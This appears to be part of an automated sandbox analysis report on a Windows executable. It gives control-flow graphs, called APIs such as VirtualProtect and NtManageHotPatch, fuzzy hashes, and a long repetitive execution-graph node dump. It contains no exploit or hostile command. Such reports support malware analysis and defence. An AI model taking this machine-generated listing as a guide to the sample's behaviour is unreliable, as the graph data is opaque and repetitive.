                                                        control_flow_graph 665 7ff71eb11880-7ff71eb1189c 666 7ff71eb11a0f-7ff71eb11a1f 665->666 667 7ff71eb118a2-7ff71eb118f9 call 7ff71eb12420 call 7ff71eb12660 665->667 667->666 672 7ff71eb118ff-7ff71eb11910 667->672 673 7ff71eb1193e-7ff71eb11941 672->673 674 7ff71eb11912-7ff71eb1191c 672->674 675 7ff71eb1194d-7ff71eb11954 673->675 676 7ff71eb11943-7ff71eb11947 673->676 674->675 677 7ff71eb1191e-7ff71eb11929 674->677 679 7ff71eb1199e-7ff71eb119a6 675->679 680 7ff71eb11956-7ff71eb11961 675->680 676->675 678 7ff71eb11a20-7ff71eb11a26 676->678 677->675 681 7ff71eb1192b-7ff71eb1193a 677->681 684 7ff71eb11b87-7ff71eb11b98 call 7ff71eb11d40 678->684 685 7ff71eb11a2c-7ff71eb11a37 678->685 679->666 683 7ff71eb119a8-7ff71eb119c1 679->683 682 7ff71eb11970-7ff71eb1199c call 7ff71eb11ba0 680->682 681->673 682->679 687 7ff71eb119df-7ff71eb119e7 683->687 685->679 689 7ff71eb11a3d-7ff71eb11a5f 685->689 691 7ff71eb119e9-7ff71eb11a0d VirtualProtect 687->691 692 7ff71eb119d0-7ff71eb119dd 687->692 694 7ff71eb11a7d-7ff71eb11a97 689->694 691->692 697 7ff71eb11a70-7ff71eb11a77 691->697 692->666 692->687 695 7ff71eb11a9d-7ff71eb11afa 694->695 696 7ff71eb11b74-7ff71eb11b82 call 7ff71eb11d40 694->696 702 7ff71eb11afc-7ff71eb11b0e 695->702 703 7ff71eb11b22-7ff71eb11b26 695->703 696->684 697->679 697->694 705 7ff71eb11b5c-7ff71eb11b6f call 7ff71eb11d40 702->705 706 7ff71eb11b10-7ff71eb11b20 702->706 703->697 704 7ff71eb11b2c-7ff71eb11b30 703->704 704->697 707 7ff71eb11b36-7ff71eb11b57 call 7ff71eb11ba0 704->707 705->696 706->703 706->705 707->705
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71EB11247), ref: 00007FF71EB119F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
• Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction ID: d31147593fc0d565bf1df132fee35307236bc73f3cb075384e8a5e26517eba5a
                                                        • Opcode Fuzzy Hash: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction Fuzzy Hash: D6512135E14946D6EB30AB25F940BBCA7A2EB14BB4F884131D96D07794CE3CF58AC721

                                                        Control-flow Graph

                                                        control_flow_graph 712 7ff71eb11800-7ff71eb11810 713 7ff71eb11812-7ff71eb11822 712->713 714 7ff71eb11824 712->714 715 7ff71eb1182b-7ff71eb11867 call 7ff71eb12290 fprintf 713->715 714->715
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
• Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction ID: 78fe8934c6acc572d9d9cb5c95da91c324fc4f8940e3003ab0c9fd0b849efd29
                                                        • Opcode Fuzzy Hash: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction Fuzzy Hash: 88F0AF11E08E8582E631BB24B9414BDE362EB497B0F809231DE4E56251DF2CF186C310

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
• Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction ID: 33b75dc1610b8b57c4939b3663c5d9c275a8f91ea2919a5ba62baac9e9cfa2e4
                                                        • Opcode Fuzzy Hash: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction Fuzzy Hash: CD01DA65A09E0681E636BB11FE0467CA2A2BF04FB0FC54031CA1D57694DF2CB99ED360

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1782
                                                        Total number of Limit Nodes:2
execution_graph: flattened node/edge listing of the rendered execution graph (graph image not preserved in this extraction; the listing is cut off at node 3621). Recoverable roots and API calls: thread-local storage housekeeping at 7ff70116219e and 7ff701162104 (EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, DeleteCriticalSection, free); signal handling at 7ff701161e65; CRT start-up at 7ff701161140 / 7ff701161160 (Sleep, _amsg_exit, _initterm, SetUnhandledExceptionFilter, malloc, strlen, memcpy, _cexit); pseudo-relocation fix-up at 7ff701161ba0 (VirtualQuery, VirtualProtect, GetLastError, memcpy); and a long wide-string handling chain from 7ff701163b50 (wcslen, wcscpy, wcscat, memset, _wcsnicmp, _wcsicmp, memcpy) with repeated calls into the helper at 7ff701161394.
7ff701161394 2 API calls 3619->3621 3622 7ff701161394 2 API calls 3620->3622 3621->3620 3623 7ff701161567 3622->3623 3624 7ff70116156c 3623->3624 3625 7ff701161394 2 API calls 3623->3625 3626 7ff701161394 2 API calls 3624->3626 3625->3624 3627 7ff701161576 3626->3627 3628 7ff70116157b 3627->3628 3629 7ff701161394 2 API calls 3627->3629 3630 7ff701161394 2 API calls 3628->3630 3629->3628 3631 7ff701161585 3630->3631 3632 7ff70116158a 3631->3632 3633 7ff701161394 2 API calls 3631->3633 3634 7ff701161394 2 API calls 3632->3634 3633->3632 3635 7ff701161599 3634->3635 3636 7ff701161394 2 API calls 3635->3636 3637 7ff7011615a3 3636->3637 3638 7ff7011615a8 3637->3638 3639 7ff701161394 2 API calls 3637->3639 3640 7ff701161394 2 API calls 3638->3640 3639->3638 3641 7ff7011615b7 3640->3641 3642 7ff701161394 2 API calls 3641->3642 3643 7ff7011615c1 3642->3643 3644 7ff7011615c6 3643->3644 3645 7ff701161394 2 API calls 3643->3645 3646 7ff701161394 2 API calls 3644->3646 3645->3644 3647 7ff7011615d0 3646->3647 3648 7ff7011615d5 3647->3648 3649 7ff701161394 2 API calls 3647->3649 3650 7ff701161394 2 API calls 3648->3650 3649->3648 3651 7ff7011615df 3650->3651 3652 7ff701161394 2 API calls 3651->3652 3653 7ff7011615e4 3652->3653 3654 7ff701161394 2 API calls 3653->3654 3655 7ff7011615f3 3654->3655 3655->3048 3655->3049 3657 7ff701161394 2 API calls 3656->3657 3658 7ff7011614b3 3657->3658 3659 7ff7011614b8 3658->3659 3660 7ff701161394 2 API calls 3658->3660 3661 7ff701161394 2 API calls 3659->3661 3660->3659 3662 7ff7011614c2 3661->3662 3663 7ff7011614c7 3662->3663 3664 7ff701161394 2 API calls 3662->3664 3665 7ff701161394 2 API calls 3663->3665 3664->3663 3666 7ff7011614d6 3665->3666 3667 7ff701161394 2 API calls 3666->3667 3668 7ff7011614e0 3667->3668 3669 7ff701161394 2 API calls 3668->3669 3670 7ff7011614e5 3669->3670 3671 7ff701161394 2 API calls 3670->3671 3672 7ff7011614f4 3671->3672 3673 7ff701161394 2 API calls 3672->3673 3674 7ff701161503 3673->3674 3675 7ff701161394 2 
API calls 3674->3675 3676 7ff701161512 3675->3676 3677 7ff701161394 2 API calls 3676->3677 3678 7ff701161521 3677->3678 3679 7ff701161530 3678->3679 3680 7ff701161394 2 API calls 3678->3680 3681 7ff701161394 2 API calls 3679->3681 3680->3679 3682 7ff70116153a 3681->3682 3683 7ff70116153f 3682->3683 3684 7ff701161394 2 API calls 3682->3684 3685 7ff701161394 2 API calls 3683->3685 3684->3683 3686 7ff70116154e 3685->3686 3687 7ff701161394 2 API calls 3686->3687 3688 7ff701161558 3687->3688 3689 7ff70116155d 3688->3689 3690 7ff701161394 2 API calls 3688->3690 3691 7ff701161394 2 API calls 3689->3691 3690->3689 3692 7ff701161567 3691->3692 3693 7ff70116156c 3692->3693 3694 7ff701161394 2 API calls 3692->3694 3695 7ff701161394 2 API calls 3693->3695 3694->3693 3696 7ff701161576 3695->3696 3697 7ff70116157b 3696->3697 3698 7ff701161394 2 API calls 3696->3698 3699 7ff701161394 2 API calls 3697->3699 3698->3697 3700 7ff701161585 3699->3700 3701 7ff70116158a 3700->3701 3702 7ff701161394 2 API calls 3700->3702 3703 7ff701161394 2 API calls 3701->3703 3702->3701 3704 7ff701161599 3703->3704 3705 7ff701161394 2 API calls 3704->3705 3706 7ff7011615a3 3705->3706 3707 7ff7011615a8 3706->3707 3708 7ff701161394 2 API calls 3706->3708 3709 7ff701161394 2 API calls 3707->3709 3708->3707 3710 7ff7011615b7 3709->3710 3711 7ff701161394 2 API calls 3710->3711 3712 7ff7011615c1 3711->3712 3713 7ff7011615c6 3712->3713 3714 7ff701161394 2 API calls 3712->3714 3715 7ff701161394 2 API calls 3713->3715 3714->3713 3716 7ff7011615d0 3715->3716 3717 7ff7011615d5 3716->3717 3718 7ff701161394 2 API calls 3716->3718 3719 7ff701161394 2 API calls 3717->3719 3718->3717 3720 7ff7011615df 3719->3720 3721 7ff701161394 2 API calls 3720->3721 3722 7ff7011615e4 3721->3722 3723 7ff701161394 2 API calls 3722->3723 3724 7ff7011615f3 3723->3724 3724->3059 3725 7ff701161440 3724->3725 3726 7ff701161394 2 API calls 3725->3726 3727 7ff70116144f 3726->3727 3728 7ff701161394 2 API calls 3727->3728 3729 7ff701161459 
3728->3729 3730 7ff70116145e 3729->3730 3731 7ff701161394 2 API calls 3729->3731 3732 7ff701161394 2 API calls 3730->3732 3731->3730 3733 7ff701161468 3732->3733 3734 7ff70116146d 3733->3734 3735 7ff701161394 2 API calls 3733->3735 3736 7ff701161394 2 API calls 3734->3736 3735->3734 3737 7ff701161477 3736->3737 3738 7ff70116147c 3737->3738 3739 7ff701161394 2 API calls 3737->3739 3740 7ff701161394 2 API calls 3738->3740 3739->3738 3741 7ff701161486 3740->3741 3742 7ff70116148b 3741->3742 3743 7ff701161394 2 API calls 3741->3743 3744 7ff701161394 2 API calls 3742->3744 3743->3742 3745 7ff701161495 3744->3745 3746 7ff70116149a 3745->3746 3747 7ff701161394 2 API calls 3745->3747 3748 7ff701161394 2 API calls 3746->3748 3747->3746 3749 7ff7011614a4 3748->3749 3750 7ff7011614a9 3749->3750 3751 7ff701161394 2 API calls 3749->3751 3752 7ff701161394 2 API calls 3750->3752 3751->3750 3753 7ff7011614b3 3752->3753 3754 7ff7011614b8 3753->3754 3755 7ff701161394 2 API calls 3753->3755 3756 7ff701161394 2 API calls 3754->3756 3755->3754 3757 7ff7011614c2 3756->3757 3758 7ff7011614c7 3757->3758 3759 7ff701161394 2 API calls 3757->3759 3760 7ff701161394 2 API calls 3758->3760 3759->3758 3761 7ff7011614d6 3760->3761 3762 7ff701161394 2 API calls 3761->3762 3763 7ff7011614e0 3762->3763 3764 7ff701161394 2 API calls 3763->3764 3765 7ff7011614e5 3764->3765 3766 7ff701161394 2 API calls 3765->3766 3767 7ff7011614f4 3766->3767 3768 7ff701161394 2 API calls 3767->3768 3769 7ff701161503 3768->3769 3770 7ff701161394 2 API calls 3769->3770 3771 7ff701161512 3770->3771 3772 7ff701161394 2 API calls 3771->3772 3773 7ff701161521 3772->3773 3774 7ff701161530 3773->3774 3775 7ff701161394 2 API calls 3773->3775 3776 7ff701161394 2 API calls 3774->3776 3775->3774 3777 7ff70116153a 3776->3777 3778 7ff70116153f 3777->3778 3779 7ff701161394 2 API calls 3777->3779 3780 7ff701161394 2 API calls 3778->3780 3779->3778 3781 7ff70116154e 3780->3781 3782 7ff701161394 2 API calls 3781->3782 3783 7ff701161558 
3782->3783 3784 7ff70116155d 3783->3784 3785 7ff701161394 2 API calls 3783->3785 3786 7ff701161394 2 API calls 3784->3786 3785->3784 3787 7ff701161567 3786->3787 3788 7ff70116156c 3787->3788 3789 7ff701161394 2 API calls 3787->3789 3790 7ff701161394 2 API calls 3788->3790 3789->3788 3791 7ff701161576 3790->3791 3792 7ff70116157b 3791->3792 3793 7ff701161394 2 API calls 3791->3793 3794 7ff701161394 2 API calls 3792->3794 3793->3792 3795 7ff701161585 3794->3795 3796 7ff70116158a 3795->3796 3797 7ff701161394 2 API calls 3795->3797 3798 7ff701161394 2 API calls 3796->3798 3797->3796 3799 7ff701161599 3798->3799 3800 7ff701161394 2 API calls 3799->3800 3801 7ff7011615a3 3800->3801 3802 7ff7011615a8 3801->3802 3803 7ff701161394 2 API calls 3801->3803 3804 7ff701161394 2 API calls 3802->3804 3803->3802 3805 7ff7011615b7 3804->3805 3806 7ff701161394 2 API calls 3805->3806 3807 7ff7011615c1 3806->3807 3808 7ff7011615c6 3807->3808 3809 7ff701161394 2 API calls 3807->3809 3810 7ff701161394 2 API calls 3808->3810 3809->3808 3811 7ff7011615d0 3810->3811 3812 7ff7011615d5 3811->3812 3813 7ff701161394 2 API calls 3811->3813 3814 7ff701161394 2 API calls 3812->3814 3813->3812 3815 7ff7011615df 3814->3815 3816 7ff701161394 2 API calls 3815->3816 3817 7ff7011615e4 3816->3817 3818 7ff701161394 2 API calls 3817->3818 3819 7ff7011615f3 3818->3819 3819->3059 3819->3068 3821 7ff7011635c1 memset 3820->3821 3831 7ff7011633c3 3820->3831 3824 7ff7011635e6 3821->3824 3822 7ff70116343a memset 3822->3831 3823 7ff70116362b wcscpy wcscat wcslen 3825 7ff701161422 2 API calls 3823->3825 3824->3823 3827 7ff701163728 3825->3827 3826 7ff701163493 wcscpy wcscat wcslen 4155 7ff701161422 3826->4155 3829 7ff701163767 3827->3829 4258 7ff701161431 3827->4258 3836 7ff7011614c7 3829->3836 3831->3821 3831->3822 3831->3826 3833 7ff70116145e 2 API calls 3831->3833 3835 7ff701163579 3831->3835 3833->3831 3834 7ff70116145e 2 API calls 3834->3829 3835->3821 3837 7ff701161394 2 API calls 3836->3837 3838 7ff7011614d6 
3837->3838 3839 7ff701161394 2 API calls 3838->3839 3840 7ff7011614e0 3839->3840 3841 7ff701161394 2 API calls 3840->3841 3842 7ff7011614e5 3841->3842 3843 7ff701161394 2 API calls 3842->3843 3844 7ff7011614f4 3843->3844 3845 7ff701161394 2 API calls 3844->3845 3846 7ff701161503 3845->3846 3847 7ff701161394 2 API calls 3846->3847 3848 7ff701161512 3847->3848 3849 7ff701161394 2 API calls 3848->3849 3850 7ff701161521 3849->3850 3851 7ff701161530 3850->3851 3852 7ff701161394 2 API calls 3850->3852 3853 7ff701161394 2 API calls 3851->3853 3852->3851 3854 7ff70116153a 3853->3854 3855 7ff70116153f 3854->3855 3856 7ff701161394 2 API calls 3854->3856 3857 7ff701161394 2 API calls 3855->3857 3856->3855 3858 7ff70116154e 3857->3858 3859 7ff701161394 2 API calls 3858->3859 3860 7ff701161558 3859->3860 3861 7ff70116155d 3860->3861 3862 7ff701161394 2 API calls 3860->3862 3863 7ff701161394 2 API calls 3861->3863 3862->3861 3864 7ff701161567 3863->3864 3865 7ff70116156c 3864->3865 3866 7ff701161394 2 API calls 3864->3866 3867 7ff701161394 2 API calls 3865->3867 3866->3865 3868 7ff701161576 3867->3868 3869 7ff70116157b 3868->3869 3870 7ff701161394 2 API calls 3868->3870 3871 7ff701161394 2 API calls 3869->3871 3870->3869 3872 7ff701161585 3871->3872 3873 7ff70116158a 3872->3873 3874 7ff701161394 2 API calls 3872->3874 3875 7ff701161394 2 API calls 3873->3875 3874->3873 3876 7ff701161599 3875->3876 3877 7ff701161394 2 API calls 3876->3877 3878 7ff7011615a3 3877->3878 3879 7ff7011615a8 3878->3879 3880 7ff701161394 2 API calls 3878->3880 3881 7ff701161394 2 API calls 3879->3881 3880->3879 3882 7ff7011615b7 3881->3882 3883 7ff701161394 2 API calls 3882->3883 3884 7ff7011615c1 3883->3884 3885 7ff7011615c6 3884->3885 3886 7ff701161394 2 API calls 3884->3886 3887 7ff701161394 2 API calls 3885->3887 3886->3885 3888 7ff7011615d0 3887->3888 3889 7ff7011615d5 3888->3889 3890 7ff701161394 2 API calls 3888->3890 3891 7ff701161394 2 API calls 3889->3891 3890->3889 3892 7ff7011615df 3891->3892 
3893 7ff701161394 2 API calls 3892->3893 3894 7ff7011615e4 3893->3894 3895 7ff701161394 2 API calls 3894->3895 3896 7ff7011615f3 3895->3896 3896->3084 3898 7ff701162f88 3897->3898 3899 7ff7011614a9 2 API calls 3898->3899 3900 7ff701162fd0 3899->3900 3900->3056 3902 7ff701162690 10 API calls 3901->3902 3903 7ff70116391e 3902->3903 3904 7ff7011614a9 2 API calls 3903->3904 3923 7ff701163b21 3903->3923 3905 7ff701163967 3904->3905 3913 7ff701163b28 3905->3913 4357 7ff7011614b8 3905->4357 3908 7ff701163a87 memset 4429 7ff70116148b 3908->4429 3910 7ff7011614b8 2 API calls 3912 7ff70116398f 3910->3912 3912->3908 3912->3910 4422 7ff7011615d5 3912->4422 4660 7ff7011615c6 3913->4660 3917 7ff7011614b8 2 API calls 3918 7ff701163b07 3917->3918 3918->3913 3919 7ff701163b0b 3918->3919 4579 7ff70116147c 3919->4579 3922 7ff70116145e 2 API calls 3922->3923 3923->3069 3925 7ff7011682d0 malloc 3924->3925 3926 7ff7011613b8 3925->3926 3927 7ff7011613c6 NtManageHotPatch 3926->3927 3927->3127 3929 7ff70116266f memset 3928->3929 3929->3345 4012 7ff70116155d 3930->4012 3932 7ff7011627f4 3933 7ff7011614c7 2 API calls 3932->3933 3936 7ff701162816 3933->3936 3935 7ff701162785 wcsncmp 4047 7ff7011614e5 3935->4047 3938 7ff701161503 2 API calls 3936->3938 3939 7ff70116283d 3938->3939 3941 7ff701162847 memset 3939->3941 3940 7ff701162d27 3943 7ff701162877 3941->3943 3942 7ff7011628bc wcscpy wcscat wcslen 3944 7ff7011628ee wcslen 3942->3944 3945 7ff70116291a 3942->3945 3943->3942 3944->3945 3946 7ff701162967 wcslen 3945->3946 3949 7ff701162985 3945->3949 3946->3949 3947 7ff7011629d9 wcslen 3948 7ff7011614a9 2 API calls 3947->3948 3950 7ff701162a73 3948->3950 3949->3940 3949->3947 3951 7ff7011614a9 2 API calls 3950->3951 3952 7ff701162bd2 3951->3952 4102 7ff7011614f4 3952->4102 3955 7ff7011614c7 2 API calls 3956 7ff701162c99 3955->3956 3957 7ff7011614c7 2 API calls 3956->3957 3958 7ff701162cb1 3957->3958 3959 7ff70116145e 2 API calls 3958->3959 3960 7ff701162cbb 3959->3960 3961 7ff70116145e 2 API 
calls 3960->3961 3962 7ff701162cc5 3961->3962 3962->3342 3964 7ff701161394 2 API calls 3963->3964 3965 7ff701161521 3964->3965 3966 7ff701161530 3965->3966 3967 7ff701161394 2 API calls 3965->3967 3968 7ff701161394 2 API calls 3966->3968 3967->3966 3969 7ff70116153a 3968->3969 3970 7ff70116153f 3969->3970 3971 7ff701161394 2 API calls 3969->3971 3972 7ff701161394 2 API calls 3970->3972 3971->3970 3973 7ff70116154e 3972->3973 3974 7ff701161394 2 API calls 3973->3974 3975 7ff701161558 3974->3975 3976 7ff70116155d 3975->3976 3977 7ff701161394 2 API calls 3975->3977 3978 7ff701161394 2 API calls 3976->3978 3977->3976 3979 7ff701161567 3978->3979 3980 7ff70116156c 3979->3980 3981 7ff701161394 2 API calls 3979->3981 3982 7ff701161394 2 API calls 3980->3982 3981->3980 3983 7ff701161576 3982->3983 3984 7ff70116157b 3983->3984 3985 7ff701161394 2 API calls 3983->3985 3986 7ff701161394 2 API calls 3984->3986 3985->3984 3987 7ff701161585 3986->3987 3988 7ff70116158a 3987->3988 3989 7ff701161394 2 API calls 3987->3989 3990 7ff701161394 2 API calls 3988->3990 3989->3988 3991 7ff701161599 3990->3991 3992 7ff701161394 2 API calls 3991->3992 3993 7ff7011615a3 3992->3993 3994 7ff7011615a8 3993->3994 3995 7ff701161394 2 API calls 3993->3995 3996 7ff701161394 2 API calls 3994->3996 3995->3994 3997 7ff7011615b7 3996->3997 3998 7ff701161394 2 API calls 3997->3998 3999 7ff7011615c1 3998->3999 4000 7ff7011615c6 3999->4000 4001 7ff701161394 2 API calls 3999->4001 4002 7ff701161394 2 API calls 4000->4002 4001->4000 4003 7ff7011615d0 4002->4003 4004 7ff7011615d5 4003->4004 4005 7ff701161394 2 API calls 4003->4005 4006 7ff701161394 2 API calls 4004->4006 4005->4004 4007 7ff7011615df 4006->4007 4008 7ff701161394 2 API calls 4007->4008 4009 7ff7011615e4 4008->4009 4010 7ff701161394 2 API calls 4009->4010 4011 7ff7011615f3 4010->4011 4011->3344 4013 7ff701161394 2 API calls 4012->4013 4014 7ff701161567 4013->4014 4015 7ff70116156c 4014->4015 4016 7ff701161394 2 API calls 4014->4016 4017 
7ff701161394 2 API calls 4015->4017 4016->4015 4018 7ff701161576 4017->4018 4019 7ff70116157b 4018->4019 4020 7ff701161394 2 API calls 4018->4020 4021 7ff701161394 2 API calls 4019->4021 4020->4019 4022 7ff701161585 4021->4022 4023 7ff70116158a 4022->4023 4024 7ff701161394 2 API calls 4022->4024 4025 7ff701161394 2 API calls 4023->4025 4024->4023 4026 7ff701161599 4025->4026 4027 7ff701161394 2 API calls 4026->4027 4028 7ff7011615a3 4027->4028 4029 7ff7011615a8 4028->4029 4030 7ff701161394 2 API calls 4028->4030 4031 7ff701161394 2 API calls 4029->4031 4030->4029 4032 7ff7011615b7 4031->4032 4033 7ff701161394 2 API calls 4032->4033 4034 7ff7011615c1 4033->4034 4035 7ff7011615c6 4034->4035 4036 7ff701161394 2 API calls 4034->4036 4037 7ff701161394 2 API calls 4035->4037 4036->4035 4038 7ff7011615d0 4037->4038 4039 7ff7011615d5 4038->4039 4040 7ff701161394 2 API calls 4038->4040 4041 7ff701161394 2 API calls 4039->4041 4040->4039 4042 7ff7011615df 4041->4042 4043 7ff701161394 2 API calls 4042->4043 4044 7ff7011615e4 4043->4044 4045 7ff701161394 2 API calls 4044->4045 4046 7ff7011615f3 4045->4046 4046->3932 4046->3935 4046->3940 4048 7ff701161394 2 API calls 4047->4048 4049 7ff7011614f4 4048->4049 4050 7ff701161394 2 API calls 4049->4050 4051 7ff701161503 4050->4051 4052 7ff701161394 2 API calls 4051->4052 4053 7ff701161512 4052->4053 4054 7ff701161394 2 API calls 4053->4054 4055 7ff701161521 4054->4055 4056 7ff701161530 4055->4056 4057 7ff701161394 2 API calls 4055->4057 4058 7ff701161394 2 API calls 4056->4058 4057->4056 4059 7ff70116153a 4058->4059 4060 7ff70116153f 4059->4060 4061 7ff701161394 2 API calls 4059->4061 4062 7ff701161394 2 API calls 4060->4062 4061->4060 4063 7ff70116154e 4062->4063 4064 7ff701161394 2 API calls 4063->4064 4065 7ff701161558 4064->4065 4066 7ff70116155d 4065->4066 4067 7ff701161394 2 API calls 4065->4067 4068 7ff701161394 2 API calls 4066->4068 4067->4066 4069 7ff701161567 4068->4069 4070 7ff70116156c 4069->4070 4071 7ff701161394 2 API 
calls 4069->4071 4072 7ff701161394 2 API calls 4070->4072 4071->4070 4073 7ff701161576 4072->4073 4074 7ff70116157b 4073->4074 4075 7ff701161394 2 API calls 4073->4075 4076 7ff701161394 2 API calls 4074->4076 4075->4074 4077 7ff701161585 4076->4077 4078 7ff70116158a 4077->4078 4079 7ff701161394 2 API calls 4077->4079 4080 7ff701161394 2 API calls 4078->4080 4079->4078 4081 7ff701161599 4080->4081 4082 7ff701161394 2 API calls 4081->4082 4083 7ff7011615a3 4082->4083 4084 7ff7011615a8 4083->4084 4085 7ff701161394 2 API calls 4083->4085 4086 7ff701161394 2 API calls 4084->4086 4085->4084 4087 7ff7011615b7 4086->4087 4088 7ff701161394 2 API calls 4087->4088 4089 7ff7011615c1 4088->4089 4090 7ff7011615c6 4089->4090 4091 7ff701161394 2 API calls 4089->4091 4092 7ff701161394 2 API calls 4090->4092 4091->4090 4093 7ff7011615d0 4092->4093 4094 7ff7011615d5 4093->4094 4095 7ff701161394 2 API calls 4093->4095 4096 7ff701161394 2 API calls 4094->4096 4095->4094 4097 7ff7011615df 4096->4097 4098 7ff701161394 2 API calls 4097->4098 4099 7ff7011615e4 4098->4099 4100 7ff701161394 2 API calls 4099->4100 4101 7ff7011615f3 4100->4101 4101->3932 4103 7ff701161394 2 API calls 4102->4103 4104 7ff701161503 4103->4104 4105 7ff701161394 2 API calls 4104->4105 4106 7ff701161512 4105->4106 4107 7ff701161394 2 API calls 4106->4107 4108 7ff701161521 4107->4108 4109 7ff701161530 4108->4109 4110 7ff701161394 2 API calls 4108->4110 4111 7ff701161394 2 API calls 4109->4111 4110->4109 4112 7ff70116153a 4111->4112 4113 7ff70116153f 4112->4113 4114 7ff701161394 2 API calls 4112->4114 4115 7ff701161394 2 API calls 4113->4115 4114->4113 4116 7ff70116154e 4115->4116 4117 7ff701161394 2 API calls 4116->4117 4118 7ff701161558 4117->4118 4119 7ff70116155d 4118->4119 4120 7ff701161394 2 API calls 4118->4120 4121 7ff701161394 2 API calls 4119->4121 4120->4119 4122 7ff701161567 4121->4122 4123 7ff70116156c 4122->4123 4124 7ff701161394 2 API calls 4122->4124 4125 7ff701161394 2 API calls 4123->4125 4124->4123 
4126 7ff701161576 4125->4126 4127 7ff70116157b 4126->4127 4128 7ff701161394 2 API calls 4126->4128 4129 7ff701161394 2 API calls 4127->4129 4128->4127 4130 7ff701161585 4129->4130 4131 7ff70116158a 4130->4131 4132 7ff701161394 2 API calls 4130->4132 4133 7ff701161394 2 API calls 4131->4133 4132->4131 4134 7ff701161599 4133->4134 4135 7ff701161394 2 API calls 4134->4135 4136 7ff7011615a3 4135->4136 4137 7ff7011615a8 4136->4137 4138 7ff701161394 2 API calls 4136->4138 4139 7ff701161394 2 API calls 4137->4139 4138->4137 4140 7ff7011615b7 4139->4140 4141 7ff701161394 2 API calls 4140->4141 4142 7ff7011615c1 4141->4142 4143 7ff7011615c6 4142->4143 4144 7ff701161394 2 API calls 4142->4144 4145 7ff701161394 2 API calls 4143->4145 4144->4143 4146 7ff7011615d0 4145->4146 4147 7ff7011615d5 4146->4147 4148 7ff701161394 2 API calls 4146->4148 4149 7ff701161394 2 API calls 4147->4149 4148->4147 4150 7ff7011615df 4149->4150 4151 7ff701161394 2 API calls 4150->4151 4152 7ff7011615e4 4151->4152 4153 7ff701161394 2 API calls 4152->4153 4154 7ff7011615f3 4153->4154 4154->3955 4156 7ff701161394 2 API calls 4155->4156 4157 7ff70116142c 4156->4157 4158 7ff701161431 4157->4158 4159 7ff701161394 2 API calls 4157->4159 4160 7ff701161394 2 API calls 4158->4160 